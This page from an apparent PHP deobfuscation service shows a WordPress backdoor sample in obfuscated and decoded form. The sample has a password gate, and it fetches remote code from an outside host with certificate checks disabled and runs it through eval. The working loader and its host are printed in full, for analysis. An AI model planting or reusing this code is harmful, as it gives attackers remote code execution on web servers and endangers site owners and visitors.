PHP deobfuscation, decryption, reconstruction tool

Obfuscated php code

<?php ?><?php error_reporting(0); if(isset($_REQUEST["ok"])){die(">ok<");};?><?php
if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '6e4d5228cf850d984a9159d8a6957eb2252f871ba2bdab40c199c983ea7e93d1') {
      $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } }
?>
<?php
goto ufyJM; AaPQL: $SS8Fu .= "\157"; goto XxOur; gJ1dM: $SS8Fu .= "\164\56\x38\x2f"; goto BPiac; Hn59D: $SS8Fu .= "\x61"; goto dbXUc; BPiac: $SS8Fu .= "\144\154\157\57"; goto Hn59D; aqi1A: $SS8Fu .= "\57"; goto lnPzn; pYuEx: $SS8Fu .= "\x74\170"; goto gJ1dM; ufyJM: $SS8Fu = ''; goto pYuEx; h0m9f: $SS8Fu .= "\141\x6d\x61\x64\x2f"; goto aqi1A; pJ6Ea: eval("\77\76" . TW2kx(strrev($SS8Fu))); goto Llwav; dbXUc: $SS8Fu .= "\155\x61\144\57\x70"; goto AaPQL; EDDpp: $SS8Fu .= "\x2e\x31\x30"; goto h0m9f; Vt2Z2: $SS8Fu .= "\150"; goto pJ6Ea; XxOur: $SS8Fu .= "\x74"; goto EDDpp; lnPzn: $SS8Fu .= "\72\163\160\x74\164"; goto Vt2Z2; Llwav: function tw2kx($V1_rw = '') { goto GAPWw; laz_R: curl_close($xM315); goto IoTv3; HSzma: curl_setopt($xM315, CURLOPT_SSL_VERIFYHOST, false); goto iCv9F; GAPWw: $xM315 = curl_init(); goto ztSlD; iCv9F: curl_setopt($xM315, CURLOPT_URL, $V1_rw); goto iefx0; fLEdf: curl_setopt($xM315, CURLOPT_TIMEOUT, 500); goto Un6kY; ztSlD: curl_setopt($xM315, CURLOPT_RETURNTRANSFER, true); goto fLEdf; IoTv3: return $tvmad; goto GP0kC; Un6kY: curl_setopt($xM315, CURLOPT_SSL_VERIFYPEER, false); goto HSzma; iefx0: $tvmad = curl_exec($xM315); goto laz_R; GP0kC: }

Decoded(de-Obfuscated) php code

<?php

error_reporting(0);
if (isset($_REQUEST["ok"])) {
    die(">ok<");
}
if (function_exists('session_start')) {
    session_start();
    if (!isset($_SESSION['secretyt'])) {
        $_SESSION['secretyt'] = false;
    }
    if (!$_SESSION['secretyt']) {
        if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '6e4d5228cf850d984a9159d8a6957eb2252f871ba2bdab40c199c983ea7e93d1') {
            $_SESSION['secretyt'] = true;
        } else {
            die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>');
        }
    }
}
$SS8Fu = '';
$SS8Fu = "tx";
$SS8Fu = "txt.8/";
$SS8Fu = "txt.8/dlo/";
$SS8Fu = "txt.8/dlo/a";
$SS8Fu = "txt.8/dlo/amad/p";
$SS8Fu = "txt.8/dlo/amad/po";
$SS8Fu = "txt.8/dlo/amad/pot";
$SS8Fu = "txt.8/dlo/amad/pot.10";
$SS8Fu = "txt.8/dlo/amad/pot.10amad/";
$SS8Fu = "txt.8/dlo/amad/pot.10amad//";
$SS8Fu = "txt.8/dlo/amad/pot.10amad//:sptt";
$SS8Fu = "txt.8/dlo/amad/pot.10amad//:sptth";
eval("?>" . TW2kx("https://dama01.top/dama/old/8.txt"));
function tw2kx($V1_rw = '')
{
    $xM315 = curl_init();
    curl_setopt($xM315, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($xM315, CURLOPT_TIMEOUT, 500);
    curl_setopt($xM315, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($xM315, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($xM315, CURLOPT_URL, $V1_rw);
    $tvmad = curl_exec($xM315);
    curl_close($xM315);
    return $tvmad;
}

Malware detection & removal plugin for WordPress

（C）2020 Wordpress Doctor All rights reserved.